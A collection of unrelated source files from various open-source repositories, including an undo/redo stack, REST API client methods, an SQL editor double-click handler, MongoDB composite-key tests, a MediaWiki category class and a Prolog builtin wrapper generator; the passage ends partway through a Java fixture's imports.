get: function get() {
return _window_event.EuiWindowEvent;
}
});
Object.defineProperty(exports, "useDependentState", {
enumerable: true,
get: function get() {
return _hooks.useDependentState;
}
});
exports.keys = void 0;
var keys = _interopRequireWildcard(require("./keys"));
exports.keys = keys;
var _accessibility = require("./accessibility");
var _alignment = require("./alignment");
var _color = require("./color");
var _color_picker = require("./color_picker");
var _copy_to_clipboard = require("./copy_to_clipboard");
var _format = require("./format");
var _number = require("./number");
var _paging = require("./paging");
var _random = require("./random");
var _security = require("./security");
var _string = require("./string");
var _sort = require("./sort");
var _popover = require("./popover");
var _transition = require("./transition");
var _window_event = require("./window_event");
var _hooks = require("./hooks");
|
hhd3/Mark-Mind
|
src/renderer/mind/command/stack.js
|
class Stack {
constructor(limit) {
this.limit = limit || 30;
this.undos = [];
this.redos = [];
this.saveCommand = null;
}
execute(command) {
this.clearRedo();
command.execute();
var length = this.undos.length;
if (length >= this.limit) {
this.undos.shift();
}
this.undos.push(command);
this.change(command)
}
undo() {
if(this.canUndo()) {
var command = this.undos.pop();
this.redos.push(command);
command.undo();
this.change(command)
}
}
canUndo() {
return !!this.undos.length
}
redo() {
if (this.canRedo()) {
var command = this.redos.pop()
this.undos.push(command);
command.redo();
this.change(command)
}
}
canRedo() {
return !!this.redos.length
}
save() {
this.saveCommand = this.undos[this.undos.length - 1];
}
dirty() {
return this.saveCommand != this.undos[this.undos.length - 1];
}
clearRedo() {
this.redos = [];
}
clear() {
this.undos = [];
this.redos = [];
this.saveCommand = null;
this.change({ name: 'clear' });
}
change() { }
}
export default Stack;
|
corder-ybh/xcEduCode
|
xc-framework-model/src/main/java/com/xuecheng/framework/domain/goods/response/CategoryResult.java
|
package com.xuecheng.framework.domain.goods.response;
import com.xuecheng.framework.domain.goods.Category;
import com.xuecheng.framework.model.response.ResponseResult;
import com.xuecheng.framework.model.response.ResultCode;
import lombok.Data;
@Data
public class CategoryResult extends ResponseResult {
Category category;
public CategoryResult(ResultCode resultCode, Category category) {
super(resultCode);
this.category = category;
}
}
|
Sanjeevani19/data-hub-central-community
|
ui/src/api/OSApi.js
|
<reponame>Sanjeevani19/data-hub-central-community
import axios from 'axios';
export default {
name: 'OSApi',
getFlowNames() {
return axios
.get('/api/os/getFlowNames/')
.then(response => {
return { response: response.data };
})
.catch(error => {
console.error('error:', error);
return error;
});
},
runFlows() {
return axios
.post('/api/os/runFlows/')
.then(response => {
console.log('Returning ' + response.data);
return { response: response.data };
})
.catch(error => {
console.error('error:', error);
return error;
});
},
deployToDH() {
console.log('In deloyToDHS');
return axios
.get('/api/os/deployToDH/')
.then(response => {
console.log('Returning ' + response.data);
return { response: response.data };
})
.catch(error => {
console.error('error:', error);
return error;
});
},
gradle(command) {
console.log('In OS API gradle, command=' + command);
return axios
.post('/api/os/gradle/', { task: command })
.then(response => {
console.log('Returning ' + response.data);
return { response: response.data };
})
.catch(error => {
console.error('error:', error);
return error;
});
},
getDataHubConfig() {
return axios
.get('/api/os/getDHprojectConfig/')
.then(response => {
console.log('Returning ' + response.data);
return response.data;
})
.catch(error => {
console.error('Error getting DHS config:', error);
return error;
});
}
};
|
opengauss-mirror/DataStudio
|
code/datastudio/src/org.opengauss.mppdbide.view/src/org/opengauss/mppdbide/view/core/sourceeditor/SQLDoubleClickStrategy.java
|
<filename>code/datastudio/src/org.opengauss.mppdbide.view/src/org/opengauss/mppdbide/view/core/sourceeditor/SQLDoubleClickStrategy.java
/*
* Copyright (c) 2022 Huawei Technologies Co.,Ltd.
*
* openGauss is licensed under Mulan PSL v2.
* You can use this software according to the terms and conditions of the Mulan PSL v2.
* You may obtain a copy of Mulan PSL v2 at:
*
* http://license.coscl.org.cn/MulanPSL2
*
* THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
* EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
* MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
* See the Mulan PSL v2 for more details.
*/
package org.opengauss.mppdbide.view.core.sourceeditor;
import org.eclipse.jface.text.BadLocationException;
import org.eclipse.jface.text.IDocument;
import org.eclipse.jface.text.ITextDoubleClickStrategy;
import org.eclipse.jface.text.ITextViewer;
import org.opengauss.mppdbide.utils.logger.MPPDBIDELoggerUtility;
import org.opengauss.mppdbide.view.utils.CharPairsUtil;
import org.opengauss.mppdbide.view.utils.DSDefaultCharacterPairMatcherUtil;
import org.opengauss.mppdbide.view.utils.DSRegion;
/**
*
* Title: class
*
* Description: The Class SQLDoubleClickStrategy.
*
* @since 3.0.0
*/
public class SQLDoubleClickStrategy implements ITextDoubleClickStrategy {
/**
* The text.
*/
protected ITextViewer fText;
/**
* The current position.
*/
protected int currentPosition;
/**
* The start position.
*/
protected int startPosition;
/**
* The end position.
*/
protected int endPosition;
/**
* Instantiates a new SQL double click strategy.
*/
public SQLDoubleClickStrategy() {
super();
}
/**
* Double clicked.
*
* @param viewer the viewer
*/
@Override
public void doubleClicked(ITextViewer viewer) {
/* Get the viewer we are dealing with. */
fText = viewer;
/* Get the double-click location in the document. */
currentPosition = viewer.getSelectedRange().x;
if (currentPosition < 0 || currentPosition > fText.getDocument().getLength()) {
return;
}
try {
if (!selectBracketBlock()) {
selectWord();
}
} catch (BadLocationException exception) {
// do nothing
MPPDBIDELoggerUtility.error("SQLDoubleClickStrategy.doubleClicked(): BadLocationException occurred.",
exception);
}
}
/**
* Match brackets at.
*
* @return true, if successful
* @throws BadLocationException the bad location exception
*/
protected boolean matchBracketsAt() throws BadLocationException {
boolean isForward = true;
CharPairsUtil fPairs = new CharPairsUtil(DSDefaultCharacterPairMatcherUtil.getMatchPunctuations());
DSRegion region = (DSRegion) DSDefaultCharacterPairMatcherUtil.getRegion(fText.getDocument(), currentPosition,
fPairs, isForward, DSDefaultCharacterPairMatcherUtil.SQL_PARTITIONING, true, false);
if (null != region) {
String partition = null != region.getPartitionType() ? region.getPartitionType() : "";
if ((partition.equals(DSDefaultCharacterPairMatcherUtil.SQL_DOUBLE_QUOTES_IDENTIFIER)
|| partition.equals(DSDefaultCharacterPairMatcherUtil.SQL_STRING)) && region.getForward()) {
startPosition = region.getOffset() - 1;
endPosition = region.getOffset() + region.getLength() - 1;
return true;
} else {
startPosition = region.getOffset();
endPosition = region.getOffset() + region.getLength() - 1;
return true;
}
}
return false;
}
/**
* Match word.
*
* @return true, if successful
*/
protected boolean matchWord() {
IDocument doc = fText.getDocument();
try {
int position = currentPosition;
char chr;
// Scan back to get the beginning of the word.
while (position >= 0) {
chr = doc.getChar(position);
if (!Character.isJavaIdentifierPart(chr)) {
break;
}
--position;
}
startPosition = position;
// Scan forward for the end of the word.
position = currentPosition;
int length = doc.getLength();
while (position < length) {
chr = doc.getChar(position);
if (!Character.isJavaIdentifierPart(chr)) {
break;
}
++position;
}
endPosition = position;
return true;
} catch (BadLocationException exception) {
// do nothing
MPPDBIDELoggerUtility.error("SQLDoubleClickStrategy.matchWord(): BadLocationException occurred.",
exception);
}
return false;
}
/**
* Select bracket block.
*
* @return true, if successful
* @throws BadLocationException the bad location exception
*/
protected boolean selectBracketBlock() throws BadLocationException {
if (matchBracketsAt()) {
if (startPosition == endPosition) {
fText.setSelectedRange(startPosition, 0);
} else {
fText.setSelectedRange(startPosition + 1, endPosition - startPosition - 1);
}
return true;
}
return false;
}
/**
* Select word.
*/
protected void selectWord() {
if (matchWord()) {
if (startPosition == endPosition) {
fText.setSelectedRange(startPosition, 0);
} else {
fText.setSelectedRange(startPosition + 1, endPosition - startPosition - 1);
}
}
}
}
|
eumis/pyviews
|
pyviews/rendering/common.py
|
"""Common functionality for rendering package"""
from contextlib import contextmanager
from contextvars import ContextVar
from functools import wraps
from typing import Union
from injectool import dependency
from pyviews.core import PyViewsError, InheritedDict, Node, XmlNode, InstanceNode, ViewInfo
class RenderingError(PyViewsError):
"""Error for rendering"""
def __init__(self, message: str = None, view_info: ViewInfo = None):
super().__init__(message=message, view_info=view_info)
class RenderingContext(dict):
"""Used as rendering arguments container, passed to rendering step"""
@property
def node_globals(self) -> InheritedDict:
"""Node globals"""
return self.get('node_globals', None)
@node_globals.setter
def node_globals(self, value):
self['node_globals'] = value
@property
def parent_node(self) -> Union[Node, InstanceNode]:
"""Parent node"""
return self.get('parent_node', None)
@parent_node.setter
def parent_node(self, value: Union[Node, InstanceNode]):
self['parent_node'] = value
@property
def xml_node(self) -> XmlNode:
"""xml node"""
return self.get('xml_node', None)
@xml_node.setter
def xml_node(self, value: XmlNode):
self['xml_node'] = value
@dependency
def get_child_context(xml_node: XmlNode, parent_node: Node,
_: RenderingContext) -> RenderingContext:
"""Return"""
return RenderingContext({
'parent_node': parent_node,
'node_globals': InheritedDict(parent_node.node_globals),
'xml_node': xml_node
})
_CONTEXT_VAR: ContextVar[RenderingContext] = ContextVar('rendering_context')
@contextmanager
def use_context(context: RenderingContext) -> RenderingContext:
"""Stores rendering context to context var"""
token = _CONTEXT_VAR.set(context)
try:
yield context
finally:
_CONTEXT_VAR.reset(token)
def get_rendering_context() -> RenderingContext:
"""Returns current rendering context"""
return _CONTEXT_VAR.get(None)
def pass_rendering_context(func):
"""Passes rendering context as default argument"""
@wraps(func)
def _decorated(*args, **kwargs):
ctx = get_rendering_context()
return func(*args, **kwargs, rendering_context=ctx)
return _decorated
|
hmrc/manage-transit-movements-departure-frontend
|
test/base/SpecBase.scala
|
<reponame>hmrc/manage-transit-movements-departure-frontend<filename>test/base/SpecBase.scala
/*
* Copyright 2022 HM Revenue & Customs
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package base
import config.FrontendAppConfig
import models.{EoriNumber, Index, LocalReferenceNumber, UserAnswers}
import org.scalatest.concurrent.{IntegrationPatience, ScalaFutures}
import org.scalatest.freespec.AnyFreeSpec
import org.scalatest.matchers.must.Matchers
import org.scalatest.{EitherValues, OptionValues, TryValues}
import org.scalatestplus.mockito.MockitoSugar
import org.scalatestplus.play.guice.GuiceOneAppPerSuite
import pages.QuestionPage
import play.api.i18n.{Messages, MessagesApi}
import play.api.inject.Injector
import play.api.libs.json.{Json, Reads, Writes}
import play.api.mvc.AnyContentAsEmpty
import play.api.test.FakeRequest
import uk.gov.hmrc.http.HeaderCarrier
trait SpecBase
extends AnyFreeSpec
with Matchers
with OptionValues
with EitherValues
with GuiceOneAppPerSuite
with TryValues
with ScalaFutures
with IntegrationPatience
with MockitoSugar {
val eoriNumber: EoriNumber = EoriNumber("GB1234567891234")
val lrn: LocalReferenceNumber = LocalReferenceNumber("ABCD1234567890123").get
val index: Index = Index(0)
val referenceIndex: Index = Index(0)
val documentIndex: Index = Index(0)
val itemIndex: Index = Index(0)
val packageIndex: Index = Index(0)
val containerIndex: Index = Index(0)
def fakeRequest: FakeRequest[AnyContentAsEmpty.type] = FakeRequest("", "")
val emptyUserAnswers: UserAnswers = UserAnswers(lrn, eoriNumber, Json.obj())
implicit val hc: HeaderCarrier = HeaderCarrier()
def injector: Injector = app.injector
def messagesApi: MessagesApi = injector.instanceOf[MessagesApi]
implicit def messages: Messages = messagesApi.preferred(fakeRequest)
def frontendAppConfig: FrontendAppConfig = injector.instanceOf[FrontendAppConfig]
implicit class RichUserAnswers(userAnswers: UserAnswers) {
def getValue[T](page: QuestionPage[T])(implicit rds: Reads[T]): T =
userAnswers.get(page).value
def setValue[T](page: QuestionPage[T], value: T)(implicit wts: Writes[T]): UserAnswers =
userAnswers.set(page, value).success.value
def setValue[T](page: QuestionPage[T], value: Option[T])(implicit wts: Writes[T]): UserAnswers =
value.map(setValue(page, _)).getOrElse(userAnswers)
def removeValue(page: QuestionPage[_]): UserAnswers =
userAnswers.remove(page).success.value
}
}
|
manovotn/core
|
impl/src/test/java/org/jboss/weld/tests/unit/VersionTest.java
|
package org.jboss.weld.tests.unit;
import org.jboss.weld.util.reflection.Formats;
import org.junit.Test;
import static org.junit.Assert.assertEquals;
public class VersionTest {
@Test
public void testVersionParser() {
assertEquals("1.0.0 (1981-28-12 17:00)", Formats.version("1.0.0-SNAPSHOT", "1981-28-12 17:00"));
assertEquals("1.0 (1981-28-12 17:00)", Formats.version("1.0-SNAPSHOT", "1981-28-12 17:00"));
assertEquals("1 (1981-28-12 17:00)", Formats.version("1-SNAPSHOT", "1981-28-12 17:00"));
assertEquals("1.0.0 (SNAPSHOT)", Formats.version("1.0.0-SNAPSHOT", null));
assertEquals("1.0 (SNAPSHOT)", Formats.version("1.0-SNAPSHOT", null));
assertEquals("1 (SNAPSHOT)", Formats.version("1-SNAPSHOT", null));
assertEquals("1.0.0 (BETA1)", Formats.version("1.0.0.BETA1", "1981-28-12 17:00"));
assertEquals("1.0 (BETA1)", Formats.version("1.0.BETA1", "1981-28-12 17:00"));
assertEquals("1 (BETA1)", Formats.version("1.BETA1", "1981-28-12 17:00"));
assertEquals("1.0.0 (BETA1)", Formats.version("1.0.0.BETA1", null));
assertEquals("1.0 (BETA1)", Formats.version("1.0.BETA1", null));
assertEquals("1 (BETA1)", Formats.version("1.BETA1", null));
assertEquals("1.0.0 (BETA1)", Formats.version("1.0.0-BETA1", "1981-28-12 17:00"));
assertEquals("1.0 (BETA1)", Formats.version("1.0-BETA1", "1981-28-12 17:00"));
assertEquals("1 (BETA1)", Formats.version("1-BETA1", "1981-28-12 17:00"));
assertEquals("1.0.0 (BETA1)", Formats.version("1.0.0-BETA1", null));
assertEquals("1.0 (BETA1)", Formats.version("1.0-BETA1", null));
assertEquals("1 (BETA1)", Formats.version("1-BETA1", null));
}
}
|
nosamanuel/babel-but-with-guy-fieri
|
packages/babel-plugin-transform-typescript/test/fixtures/function/parameters/expected.js
|
function f(x, ...y) {}
function g(x = 0) {}
|
open-AIMS/ereefs-database
|
src/test/java/au/gov/aims/ereefs/database/DatabaseClientTest.java
|
<reponame>open-AIMS/ereefs-database
/*
* Copyright (c) Australian Institute of Marine Science, 2021.
* @author <NAME> <<EMAIL>>
*/
package au.gov.aims.ereefs.database;
import com.mongodb.MongoWriteException;
import com.mongodb.client.MongoClient;
import com.mongodb.client.MongoCollection;
import com.mongodb.client.MongoDatabase;
import org.bson.Document;
import org.json.JSONArray;
import org.json.JSONObject;
import org.junit.Assert;
import org.junit.Test;
public class DatabaseClientTest extends DatabaseTestBase {
/**
* Test DB connection to the in-memory Database server.
*/
@Test
public void testConnection() {
DatabaseClient databaseClient = this.getDatabaseClient();
Assert.assertNotNull("The database client is null", databaseClient);
}
/**
* Documentation about the "_id" field:
* <ul>
* <li>https://docs.mongodb.com/manual/core/document/#document-id-field</li>
* </ul>
*
* <p>Example of arbitrary JSONObject used for _id:</p>
* <ul>
* <li>https://stackoverflow.com/questions/3298963/how-to-set-a-primary-key-in-mongodb#answer-34950608</li>
* <li>https://github.com/Automattic/mongoose/issues/2276</li>
* </ul>
*/
@Test
public void testCompositeKeyObject() {
DatabaseClient databaseClient = this.getDatabaseClient();
try (MongoClient mongoClient = databaseClient.getMongoClient()) {
MongoDatabase database = databaseClient.getMongoDatabase(mongoClient);
String tableName = "objectkey";
database.createCollection(tableName);
JSONObject json = new JSONObject()
.put("_id", new JSONObject()
.put("key1", "v1")
.put("key2", "v2")
)
.put("key", "value");
MongoCollection<Document> table = database.getCollection(tableName, Document.class);
table.insertOne(Document.parse(json.toString()));
}
}
@Test
public void testCompositeKeyObjectMultipleEntry() {
DatabaseClient databaseClient = this.getDatabaseClient();
try (MongoClient mongoClient = databaseClient.getMongoClient()) {
MongoDatabase database = databaseClient.getMongoDatabase(mongoClient);
String tableName = "objectkey";
database.createCollection(tableName);
MongoCollection<Document> table = database.getCollection(tableName, Document.class);
table.insertOne(Document.parse(new JSONObject()
.put("_id", new JSONObject()
.put("id", 1)
.put("type", "data")
)
.put("key", "value1").toString()));
table.insertOne(Document.parse(new JSONObject()
.put("_id", new JSONObject()
.put("id", 2)
.put("type", "data")
)
.put("key", "value2").toString()));
table.insertOne(Document.parse(new JSONObject()
.put("_id", new JSONObject()
.put("id", 1)
.put("type", "metadata")
)
.put("key", "value3").toString()));
}
}
/**
* Throws:
* com.mongodb.MongoWriteException: E11000 duplicate key error collection: testdb.objectkey index: _id_ dup key: { : { id: 1, type: "data" } }
*/
@Test(expected = MongoWriteException.class)
public void testCompositeKeyObjectDuplicateKey() {
DatabaseClient databaseClient = this.getDatabaseClient();
try (MongoClient mongoClient = databaseClient.getMongoClient()) {
MongoDatabase database = databaseClient.getMongoDatabase(mongoClient);
String tableName = "objectkey";
database.createCollection(tableName);
MongoCollection<Document> table = database.getCollection(tableName, Document.class);
table.insertOne(Document.parse(new JSONObject()
.put("_id", new JSONObject()
.put("id", 1)
.put("type", "data")
)
.put("key", "value1").toString()));
table.insertOne(Document.parse(new JSONObject()
.put("_id", new JSONObject()
.put("id", 2)
.put("type", "data")
)
.put("key", "value2").toString()));
table.insertOne(Document.parse(new JSONObject()
.put("_id", new JSONObject()
.put("id", 1)
.put("type", "metadata")
)
.put("key", "value3").toString()));
table.insertOne(Document.parse(new JSONObject()
.put("_id", new JSONObject()
.put("id", 1)
.put("type", "data")
)
.put("key", "value4").toString()));
}
}
/**
* Test to validate that Array ID are not valid with MongoDB.
* Throws:
* com.mongodb.MongoWriteException: can't use an array for _id
*
* Documentation about the "_id" field
* "The _id field may contain values of any BSON data type, other than an array."
* https://docs.mongodb.com/manual/core/document/#the-_id-field
* List of BSON data types:
* https://docs.mongodb.com/manual/reference/bson-types/
*
* https://docs.mongodb.com/manual/core/document/#field-names
* "The field name _id is reserved for use as a primary key; its value must be unique in the collection, is immutable, and may be of any type other than an array."
*/
@Test(expected = MongoWriteException.class)
public void testCompositeKeyArray() {
DatabaseClient databaseClient = this.getDatabaseClient();
try (MongoClient mongoClient = databaseClient.getMongoClient()) {
MongoDatabase database = databaseClient.getMongoDatabase(mongoClient);
String tableName = "arraykey";
database.createCollection(tableName);
JSONObject json = new JSONObject()
.put("_id", new JSONArray()
.put("key1")
.put("key2")
)
.put("key", "value");
MongoCollection<Document> table = database.getCollection(tableName, Document.class);
table.insertOne(Document.parse(json.toString()));
}
}
}
|
xuericlin/wikum
|
wikum-env3/lib/python3.7/site-packages/wikitools/category.py
|
# -*- coding: utf-8 -*-
# Copyright 2008-2016 <NAME> (<EMAIL>)
# This file is part of wikitools.
# wikitools is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# wikitools is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with wikitools. If not, see <http://www.gnu.org/licenses/>.
from wikitools.pagelist import makePage
from . import api
from . import page
class Category(page.Page):
"""A category on the wiki"""
def __init__(self, site, title=None, check=True, followRedir=True, section=None, sectionnumber=None, pageid=None):
"""
site - A wiki object
title - The page title, as a string or unicode object
check - Checks for existence, normalizes title, required for most things
followRedir - follow redirects (check must be true)
section - the section name
sectionnumber - the section number
pageid - pageid, can be in place of title
"""
page.Page.__init__(self, site=site, title=title, check=check, followRedir=followRedir, section=section, sectionnumber=sectionnumber, pageid=pageid)
self.info = {}
if self.namespace != 14:
self.setNamespace(14, check)
def getCategoryInfo(self, force=False):
"""Get some basic information about a category
Returns a dict with:
size - Total number of items in the category
pages - Number of ordinary pages
files - Number of files
subcats - Number of subcategories
"""
if self.info and not Force:
return self.info
params = {'action':'query',
'prop':'categoryinfo',
'titles':self.title
}
req = api.APIRequest(self.site, params)
res = req.query(False)
key = list(res['query']['pages'].keys())[0]
self.info = res['query']['pages'][key]['categoryinfo']
return self.info
def getAllMembers(self, titleonly=False, reload=False, namespaces=None):
"""Gets a list of pages in the category
titleonly - set to True to only create a list of strings,
else it will be a list of Page objects
reload - Deprecated, unused
namespaces - List of namespaces to restrict to
Any changes to getAllMembers functions should also be made to getUsage in category
"""
members = []
for member in self.__getMembersInternal(namespaces, self.site.limit):
if titleonly:
members.append(member.title)
else:
members.append(member)
return members
def getAllMembersGen(self, titleonly=False, reload=False, namespaces=None):
"""Generator function for pages in the category
titleonly - set to True to yield strings,
else it will yield Page objects
reload - Deprecated, unused
namespaces - List of namespaces to restrict to
"""
for member in self.__getMembersInternal(namespaces, 50):
if titleonly:
yield member.title
else:
yield member
def __getMembersInternal(self, namespaces, limit):
if 'continue' not in self.site.features:
raise exceptions.UnsupportedError("MediaWiki 1.21+ is required for this function")
params = {'action':'query',
'list':'categorymembers',
'cmtitle':self.title,
'cmlimit':limit,
}
if namespaces is not None:
params['cmnamespace'] = '|'.join([str(ns) for ns in namespaces])
req = api.APIRequest(self.site, params)
for data in req.queryGen():
for item in data['query']['categorymembers']:
yield makePage(item, self.site, False)
def __getattr__(self, name):
"""Computed attributes:
members
"""
if name != 'members':
return super().__getattr__(name)
return self.getAllMembers()
|
ForoughA/CORGI
|
testnet/prolog/builtin/register.py
|
<gh_stars>10-100
import py
from prolog.interpreter.parsing import TermBuilder
from prolog.interpreter import helper, term, error
from prolog.interpreter.signature import Signature
from prolog.interpreter.arithmetic import eval_arithmetic
from rpython.rlib.objectmodel import we_are_translated
from rpython.rlib import jit
import inspect
Signature.register_extr_attr("builtin")
jit_modules = ["control"]
class Builtin(object):
_immutable_ = True
def __init__(self, function, name, numargs, signature):
self.function = function
self.name = name
self.numargs = numargs
self.signature = signature
def call(self, engine, query, rule, scont, fcont, heap, sister_rule = None):
try:
return self.function(engine, query, rule, scont, fcont, heap, sister_rule)
except error.CatchableError as e:
e.sig_context = self.signature
raise
def _freeze_(self):
return True
def expose_builtin(*args, **kwargs):
def really_expose(func):
return make_wrapper(func, *args, **kwargs)
return really_expose
def make_wrapper(func, name, unwrap_spec=[], handles_continuation=False,
translatable=True, needs_module=False, needs_rule=False, needs_sister = False):
numargs = len(unwrap_spec)
if isinstance(name, list):
expose_as = name
name = name[0]
else:
expose_as = [name]
if not name.isalnum():
name = func.func_name
orig_funcargs = inspect.getargs(func.func_code)[0]
funcname = "wrap_%s_%s" % (name, numargs)
code = ["def %s(engine, query, rule, scont, fcont, heap, sister_rule):" % (funcname, )]
code.append(" module = rule.module")
if not translatable:
code.append(" if we_are_translated():")
code.append(" raise error.UncatchableError('%s does not work in translated version')" % (name, ))
subargs = ["engine", "heap"]
assert orig_funcargs[0] == "engine"
assert orig_funcargs[1] == "heap"
code.append(" assert isinstance(query, term.Callable)")
for i, spec in enumerate(unwrap_spec):
varname = "var%s" % (i, )
subargs.append(varname)
if spec in ("obj", "callable", "int", "atom", "arithmetic", "instream", "outstream", "stream", "list"):
code.append(" %s = query.argument_at(%s).dereference(heap)" %
(varname, i))
if spec in ("int", "atom", "arithmetic", "list", "instream", "outstream", "stream"):
code.append(
" if isinstance(%s, term.Var):" % (varname,))
code.append(
" error.throw_instantiation_error()")
if spec == "obj":
pass
elif spec == "callable":
code.append(
" if not isinstance(%s, term.Callable):" % (varname,))
code.append(
" if isinstance(%s, term.Var):" % (varname,))
code.append(
" error.throw_instantiation_error()")
code.append(
" error.throw_type_error('callable', %s)" % (varname,))
elif spec == "raw":
code.append(" %s = query.argument_at(%s)" % (varname, i))
elif spec == "int":
code.append(" %s = helper.unwrap_int(%s)" % (varname, varname))
elif spec == "atom":
code.append(" %s = helper.unwrap_atom(%s)" % (varname, varname))
elif spec == "arithmetic":
code.append(" %s = eval_arithmetic(engine, %s)" %
(varname, varname))
elif spec == "list":
code.append(" %s = helper.unwrap_list(%s)" % (varname, varname))
elif spec == "stream":
code.append(" %s = helper.unwrap_stream(engine, %s)" % (varname, varname))
elif spec == "instream":
code.append(" %s = helper.unwrap_instream(engine, %s)" % (varname, varname))
elif spec == "outstream":
code.append(" %s = helper.unwrap_outstream(engine, %s)" % (varname, varname))
else:
assert 0, "not implemented " + spec
if needs_module:
subargs.insert(2, "module")
assert orig_funcargs[2] == "module"
if needs_rule:
subargs.insert(2, "rule")
assert orig_funcargs[2] == "rule"
if handles_continuation:
subargs.append("scont")
subargs.append("fcont")
assert orig_funcargs[subargs.index("scont")] == "scont"
assert orig_funcargs[subargs.index("fcont")] == "fcont"
if needs_sister:
subargs.append("sister_rule")
call = " result = %s(%s)" % (func.func_name, ", ".join(subargs))
code.append(call)
if not handles_continuation:
code.append(" return scont, fcont, heap")
else:
code.append(" return result")
used_globals = ["helper", "error", "term", "eval_arithmetic"]
miniglobals = {key: globals()[key] for key in used_globals}
miniglobals[func.func_name] = func
exec py.code.Source("\n".join(code)).compile() in miniglobals
for name in expose_as:
signature = Signature.getsignature(name, numargs)
b = Builtin(miniglobals[funcname], funcname, numargs, signature)
signature.set_extra("builtin", b)
return func
|
NViper21/ZeroQuest
|
1.7.10-src/common/zeroquest/world/gen/layer/GenLayerRareNileBiome.java
|
package common.zeroquest.world.gen.layer;
import common.zeroquest.ModBiomes;
import net.minecraft.world.gen.layer.GenLayer;
import net.minecraft.world.gen.layer.IntCache;
public class GenLayerRareNileBiome extends GenLayer
{
private static final String __OBFID = "CL_00000562";
public GenLayerRareNileBiome(long p_i45478_1_, GenLayer p_i45478_3_)
{
super(p_i45478_1_);
this.parent = p_i45478_3_;
}
/**
* Returns a list of integer values generated by this layer. These may be interpreted as temperatures, rainfall
* amounts, or biomeList[] indices based on the particular GenLayer subclass.
*/
public int[] getInts(int p_75904_1_, int p_75904_2_, int p_75904_3_, int p_75904_4_)
{
int[] aint = this.parent.getInts(p_75904_1_ - 1, p_75904_2_ - 1, p_75904_3_ + 2, p_75904_4_ + 2);
int[] aint1 = IntCache.getIntCache(p_75904_3_ * p_75904_4_);
for (int i1 = 0; i1 < p_75904_4_; ++i1)
{
for (int j1 = 0; j1 < p_75904_3_; ++j1)
{
this.initChunkSeed((long)(j1 + p_75904_1_), (long)(i1 + p_75904_2_));
int k1 = aint[j1 + 1 + (i1 + 1) * (p_75904_3_ + 2)];
if (this.nextInt(57) == 0)
{
if (k1 == ModBiomes.redSeed.biomeID)
{
aint1[j1 + i1 * p_75904_3_] = ModBiomes.redSeed.biomeID + 128;
}
else
{
aint1[j1 + i1 * p_75904_3_] = k1;
}
}
else
{
aint1[j1 + i1 * p_75904_3_] = k1;
}
}
}
return aint1;
}
}
|
dfreese/Gray
|
include/Gray/Daq/DaqModel.h
|
/*
* Gray: A Ray Tracing-based Monte Carlo Simulator for PET
*
* Copyright (c) 2018, <NAME>, <NAME>, <NAME>, <NAME>
*
* This software is distributed under the terms of the MIT License unless
* otherwise noted. See LICENSE for further details.
*
*/
#ifndef DaqModel_h
#define DaqModel_h
#include <fstream>
#include <functional>
#include <iostream>
#include <map>
#include <memory>
#include <sstream>
#include <utility>
#include <vector>
#include "Gray/Physics/Interaction.h"
#include "Gray/Daq/DaqStats.h"
#include "Gray/Daq/Process.h"
#include "Gray/Daq/ProcessFactory.h"
#include "Gray/Daq/ProcessStats.h"
class DaqModel {
public:
using EventT = Process::EventT;
using ContainerT = Process::ContainerT;
using EventIter = Process::EventIter;
using TimeT = Process::TimeT;
using DetIdT = Process::DetIdT;
DaqModel(TimeT initial_sort_window = -1);
ContainerT& get_buffer();
void consume(std::vector<Interaction> inters);
int set_processes(const std::vector<std::string> & lines,
const Mapping::IdMappingT& mapping);
int load_processes(const std::string & filename,
const Mapping::IdMappingT& mapping);
size_t no_processes() const;
size_t no_coinc_processes() const;
long no_events() const;
long no_kept() const;
long no_dropped() const;
long no_merged() const;
long no_filtered() const;
long no_deadtimed() const;
friend std::ostream & operator << (std::ostream & os, const DaqModel & s);
EventIter hits_begin();
EventIter hits_end();
EventIter singles_begin();
EventIter singles_end();
EventIter coinc_begin();
EventIter coinc_end();
void process_hits();
void process_singles();
void process_coinc(size_t idx);
void stop_hits();
void stop_singles();
void stop_coinc(size_t idx);
void clear_complete();
DaqStats stats() const;
private:
using ProcessDescription = ProcessFactory::ProcessDescription;
int set_processes(
const std::vector<ProcessDescription> & process_descriptions,
const Mapping::IdMappingT& mapping);
void add_process(std::unique_ptr<Process> process, bool proc_print_info);
std::vector<std::pair<std::shared_ptr<const Process>, ProcessStats>> processes;
std::vector<std::pair<std::shared_ptr<const Process>, ProcessStats>> coinc_processes;
//! Tells if a given process in processes should be printed
std::vector<bool> print_info;
ContainerT input_events;
std::vector<ContainerT::difference_type> process_ready_distance;
ContainerT::difference_type min_coinc_ready_dist;
EventIter singles_ready;
EventIter coinc_ready;
EventIter begin();
EventIter end();
bool hits_stopped = false;
bool singles_stopped = false;
bool coinc_stopped = false;
};
#endif // DaqModel_h
|
dubdabasoduba/estatio
|
estatioapp/fixture/src/main/java/org/estatio/fixture/lease/LeaseForOxfTopModel001Gb.java
|
/*
*
* Copyright 2012-2014 Eurocommercial Properties NV
*
*
* Licensed under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.estatio.fixture.lease;
import java.util.SortedSet;
import javax.inject.Inject;
import org.estatio.dom.agreement.AgreementRole;
import org.estatio.dom.agreement.AgreementRoleCommunicationChannelType;
import org.estatio.dom.agreement.AgreementRoleCommunicationChannelTypeRepository;
